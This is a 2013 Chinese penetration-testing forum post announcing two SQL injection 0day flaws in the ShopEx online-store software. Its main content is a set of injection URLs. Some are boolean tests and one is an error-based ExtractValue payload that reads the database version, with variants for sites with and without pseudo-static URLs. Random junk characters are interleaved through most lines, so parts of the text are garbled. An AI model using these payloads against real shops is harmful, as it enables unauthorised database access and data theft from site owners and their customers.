中国网络渗透测试联盟

标题: shopex通杀注入0day漏洞两处 [打印本页]
作者: admin    时间: 2013-2-4 16:20
标题: shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
4 r$ l, S' y1 ^) V' f9 g* x
( r+ ?4 j( Q7 L1 K' B  N1 _! v好吧,我扯远了~~: H6 n  N- \, F  I
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~- @, _1 S) a& V* j
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:# s! S' T! R8 _! ^. @

, }. w5 D, Z% z1 m1 Vhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
4 d+ _# j9 F( t9 K) o$ N0 p/ N# H# S/ M  j% w0 k) K
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html8 b* c1 A# g* q4 Y* U

% u3 B% C7 C* nhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
5 g0 y1 A4 G$ Z$ v; I& ]3 k$ A% r
" [0 P; _- s4 G. _2 N4 q# Hhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html. h' @; j7 G; R) c1 R3 y6 _9 j
! V+ Q3 V) x8 e( |
+ D* w4 R$ J' U* A
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
& b' v9 e( C0 p5 k! Y如何注入就不多说了,10多年的东西了…不会也会了…1 p4 T( m, R6 I  ~) J5 M. C) e" o

; C  {& ^$ j3 {% z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2